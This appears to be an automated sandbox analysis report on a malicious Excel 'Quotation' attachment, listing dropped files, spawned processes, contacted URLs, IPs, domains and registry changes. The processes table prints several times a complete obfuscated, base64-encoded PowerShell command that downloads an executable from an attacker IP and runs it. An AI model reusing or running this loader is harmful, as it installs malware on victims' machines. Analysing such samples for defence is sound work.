Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Quotation.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 17:42:37 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetCache[1].hta
|
HTML document, ASCII text, with very long lines (65498), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe
|
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsccvpb0\nsccvpb0.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\igccu.exe
|
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\Desktop\Quotation.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 17:06:49 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\194FB565.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F4EC891.jpeg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 728x1080, components
3
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45B291C.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9933C675.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB31754B.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA20B1F2.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D030F5F4.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA91D6D0.png
|
PNG image data, 731 x 391, 8-bit/color RGB, interlaced
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES25D9.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Jul 3 16:06:32 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES85A4.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Jul 3 16:06:56 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\a2uw2xvw.nyi.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\czjog1ic\CSCE6080EA75C65453BAA6F2713EF82B3D.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\czjog1ic\czjog1ic.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (337)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\czjog1ic\czjog1ic.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\czjog1ic\czjog1ic.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\czjog1ic\czjog1ic.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\nsccvpb0\CSC7FE4A73D64AC4B32BC98E072D7992CAF.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nsccvpb0\nsccvpb0.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (337)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nsccvpb0\nsccvpb0.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nsccvpb0\nsccvpb0.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\pao50f23.lxw.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sinfjslw.r0v.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\w3ry335w.r5y.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF46D35A8E3D377F95.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF6EF0A24FA144A05D.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF7431E8E57B77308E.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF8DC96169C38B008D.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFD55592CC1F95D6B7.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\8C130000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 17:06:49 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\8C130000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 29 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c POWeRshElL -EX Bypass
-nOP -w 1 -c
DeVicECREDENtiAldePLoymeNT ; iEx($(iEx('[SYstem.teXT.EnCoDInG]'+[chaR]0x3A+[cHAR]0X3a+'utf8.getStriNG([SySTEm.COnvERt]'+[cHaR]58+[CHar]0X3a+'fROMbaSE64StRIng('+[cHAr]34+'JHpBWlhKTXJMICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRFZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtb24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdrYSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpEYnpheWJLY0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEdXpsV3FiV2hYQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVzcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXJYZHNvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkekFaWEpNckw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEzNS4xNTUvVDAyMDdXL2NzcnNzLmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RhUnQtU0xlRXAoMyk7c1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcaWdjY3UuZXhlIg=='+[chaR]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
POWeRshElL -EX Bypass -nOP
-w 1 -c DeVicECREDENtiAldePLoymeNT
; iEx($(iEx('[SYstem.teXT.EnCoDInG]'+[chaR]0x3A+[cHAR]0X3a+'utf8.getStriNG([SySTEm.COnvERt]'+[cHaR]58+[CHar]0X3a+'fROMbaSE64StRIng('+[cHAr]34+'JHpBWlhKTXJMICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRFZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtb24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdrYSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpEYnpheWJLY0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEdXpsV3FiV2hYQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVzcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXJYZHNvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkekFaWEpNckw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEzNS4xNTUvVDAyMDdXL2NzcnNzLmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RhUnQtU0xlRXAoMyk7c1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcaWdjY3UuZXhlIg=='+[chaR]34+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nsccvpb0\nsccvpb0.cmdline"
|
|
|
|
C:\Users\user\AppData\Roaming\igccu.exe
|
"C:\Users\user\AppData\Roaming\igccu.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\Windows Mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\Windows Mail\wab.exe"
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c POWeRshElL -EX Bypass
-nOP -w 1 -c
DeVicECREDENtiAldePLoymeNT ; iEx($(iEx('[SYstem.teXT.EnCoDInG]'+[chaR]0x3A+[cHAR]0X3a+'utf8.getStriNG([SySTEm.COnvERt]'+[cHaR]58+[CHar]0X3a+'fROMbaSE64StRIng('+[cHAr]34+'JHpBWlhKTXJMICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRFZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtb24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdrYSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpEYnpheWJLY0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEdXpsV3FiV2hYQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVzcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXJYZHNvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkekFaWEpNckw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEzNS4xNTUvVDAyMDdXL2NzcnNzLmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RhUnQtU0xlRXAoMyk7c1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcaWdjY3UuZXhlIg=='+[chaR]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
POWeRshElL -EX Bypass -nOP
-w 1 -c DeVicECREDENtiAldePLoymeNT
; iEx($(iEx('[SYstem.teXT.EnCoDInG]'+[chaR]0x3A+[cHAR]0X3a+'utf8.getStriNG([SySTEm.COnvERt]'+[cHaR]58+[CHar]0X3a+'fROMbaSE64StRIng('+[cHAr]34+'JHpBWlhKTXJMICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRFZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtb24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdrYSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpEYnpheWJLY0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEdXpsV3FiV2hYQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVzcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXJYZHNvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkekFaWEpNckw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEzNS4xNTUvVDAyMDdXL2NzcnNzLmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RhUnQtU0xlRXAoMyk7c1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcaWdjY3UuZXhlIg=='+[chaR]34+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\czjog1ic\czjog1ic.cmdline"
|
|
|
|
C:\Users\user\AppData\Roaming\igccu.exe
|
"C:\Users\user\AppData\Roaming\igccu.exe"
|
|
|
|
C:\Program Files (x86)\Internet Explorer\iexplore.exe
|
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES25D9.tmp"
"c:\Users\user\AppData\Local\Temp\nsccvpb0\CSC7FE4A73D64AC4B32BC98E072D7992CAF.TMP"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES85A4.tmp"
"c:\Users\user\AppData\Local\Temp\czjog1ic\CSCE6080EA75C65453BAA6F2713EF82B3D.TMP"
|
There are 8 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bossnacarpet.com
|
|
||
|
http://172.245.135.155/T0207W/csrss.exe
|
172.245.135.155
|
|
|
|
http://172.245.135.155/xampp/eg/IEnetCache.hta
|
172.245.135.155
|
|
|
|
http://172.245.135.155/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://172.245.135.155/T0207W/cs
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://172.245.135.155/xampp/eg/IEnetCache.htaE
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://hop.fyi/icdL
|
unknown
|
||
|
http://172.245.135.155/T0207W/csrss.exep
|
unknown
|
||
|
http://172.245.135.155/xampp/eg/IEnetCache.htaalse
|
unknown
|
||
|
http://hop.fyi/NlD6e(TIw
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://172.245.135.155/xampp/eg/IEnetCache.htahttp://172.245.135.155/xampp/eg/IEnetCache.hta
|
unknown
|
||
|
http://hop.fyi/-000
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://hop.fyi/NlD6e$
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://172.245.135.155/T0207W/csrss.exe(
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://hop.fyi/3
|
unknown
|
||
|
http://hop.fyi/0
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://172.245.135.155/T0207W/csrss.exe1d50a3a
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://172.245.135.155/xampp/eg/IEnetCache.htaC:
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
http://172.245.135.155/(
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://172.245.135.155/xampp/eg/IEnetCache.htaSettings-
|
unknown
|
||
|
http://172.245.135.155/xampp/eg/IEnetCache.hta...;6
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://hop.fyi/NlD6e
|
192.185.89.92
|
||
|
http://172.245.135.155/xampp/eg/IEnetCache.htaSettings
|
unknown
|
||
|
http://hop.fyi/NlD6ez
|
unknown
|
||
|
http://172.245.135.155/xampp/eg/IEnetCache.htax
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://go.cr
|
unknown
|
There are 33 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
vegetachcnc.com
|
107.173.4.18
|
|
|
|
bossnacarpet.com
|
173.255.204.62
|
|
|
|
hop.fyi
|
192.185.89.92
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.245.135.155
|
unknown
|
United States
|
|
|
|
173.255.204.62
|
bossnacarpet.com
|
United States
|
|
|
|
107.173.4.18
|
vegetachcnc.com
|
United States
|
|
|
|
192.185.89.92
|
hop.fyi
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
s).
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\27E25
|
27E25
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
c0.
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32BB2
|
32BB2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\330B1
|
330B1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\334B7
|
334B7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
